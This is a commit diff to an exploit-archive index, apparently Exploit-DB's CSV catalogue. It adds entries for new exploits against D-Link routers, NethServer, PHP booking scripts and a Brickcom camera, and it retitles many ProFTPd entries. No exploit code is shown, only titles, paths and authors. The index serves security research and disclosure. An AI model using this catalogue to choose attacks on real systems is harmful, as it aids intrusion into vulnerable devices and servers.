DB: 2017-08-30

10 new exploits

ProFTPd 1.2.0 (rc2) - memory leakage example Exploit
ProFTPd 1.2.0pre10 - Remote Denial of Service
ProFTPd 1.2.0 rc2 - Memory Leakage Exploit
ProFTPd 1.2.0 pre10 - Remote Denial of Service

ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)
ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)

ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)

ProFTPd 1.2 - SIZE Remote Denial of Service
ProFTPd 1.2 - 'SIZE' Remote Denial of Service

ProFTPd 1.2.x - STAT Command Denial of Service
ProFTPd 1.2.x - 'STAT' Denial of Service

ProFTPd - (ftpdctl) Local pr_ctrls_connect
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit
ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)

ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)

ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow

Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)

ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection

ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)

ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow
ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow
ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)
ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit)
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)

ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)

FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution
ftpd / ProFTPd (FreeBSD) - Remote Command Execution

ProFTPd 1.2 pre6 - snprintf Exploit
ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit

D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)
D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)

D-Link DIR615h - OS Command Injection (Metasploit)
D-Link DIR-615H - OS Command Injection (Metasploit)

ProFTPd 1.3.5 - (mod_copy) Remote Command Execution
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution

ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)

QNAP Transcode Server - Command Execution (Metasploit)

D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities
D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities

D-Link DIR-615 rev H - Multiple Vulnerabilities
D-Link DIR-615 Rev H - Multiple Vulnerabilities

D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities
D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities

D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery
D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery

D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery
D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery
NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting
NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)
D-Link DIR-600 - Authentication Bypass
Car or Cab Booking Script - Authentication Bypass
PHP Appointment Booking Script - Authentication Bypass
User Login and Management - Multiple Vulnerabilities
PHP Video Battle Script 1.0 - SQL Injection
Brickcom IP Camera - Credentials Disclosure
This commit is contained in:
Offensive Security 2017-08-30 05:01:38 +00:00
parent e3a111f58c
commit 13819fd065
12 changed files with 675 additions and 29 deletions

View file

@ -34,8 +34,8 @@ id,file,description,date,author,platform,type,port
236,platforms/linux/dos/236.sh,"RedHat 6.1/6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
244,platforms/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",linux,dos,0
262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0
@ -436,7 +436,7 @@ id,file,description,date,author,platform,type,port
2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0
2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos,0
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0
2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0
2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0
@ -1885,7 +1885,7 @@ id,file,description,date,author,platform,type,port
16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos,0
16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
16129,platforms/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
16166,platforms/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port
20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0
20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0
20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0
20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0
20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0
20558,platforms/multiple/dos/20558.txt,"Apache 1.2 - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos,0
@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port
22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0
@ -5781,7 +5781,7 @@ id,file,description,date,author,platform,type,port
381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0
393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0
394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0
395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0
396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0
401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
@ -6066,8 +6066,8 @@ id,file,description,date,author,platform,type,port
3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0
3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0
3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0
3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0
3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0
3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0
@ -6113,7 +6113,7 @@ id,file,description,date,author,platform,type,port
3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0
3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0
3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0
3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0
3772,platforms/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0
@ -6577,7 +6577,7 @@ id,file,description,date,author,platform,type,port
10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0
10038,platforms/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",linux,local,0
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,windows,local,0
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow",2009-10-12,"Michael Domberg",unix,local,0
10060,platforms/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0
10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0
10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0
@ -9220,6 +9220,7 @@ id,file,description,date,author,platform,type,port
42565,platforms/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,windows,local,0
42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9245,7 +9246,7 @@ id,file,description,date,author,platform,type,port
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80
46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
@ -9766,7 +9767,7 @@ id,file,description,date,author,platform,type,port
2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445
2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0
2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0
2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69
2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
@ -9992,7 +9993,7 @@ id,file,description,date,author,platform,type,port
4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0
4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
@ -11413,8 +11414,8 @@ id,file,description,date,author,platform,type,port
16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0
16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0
16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
@ -11631,7 +11632,7 @@ id,file,description,date,author,platform,type,port
18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
@ -11871,7 +11872,7 @@ id,file,description,date,author,platform,type,port
19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
@ -13619,7 +13620,7 @@ id,file,description,date,author,platform,type,port
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
24958,platforms/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0
24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0
24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000
@ -13751,7 +13752,7 @@ id,file,description,date,author,platform,type,port
25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0
25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0
25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
@ -15208,7 +15209,7 @@ id,file,description,date,author,platform,type,port
36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
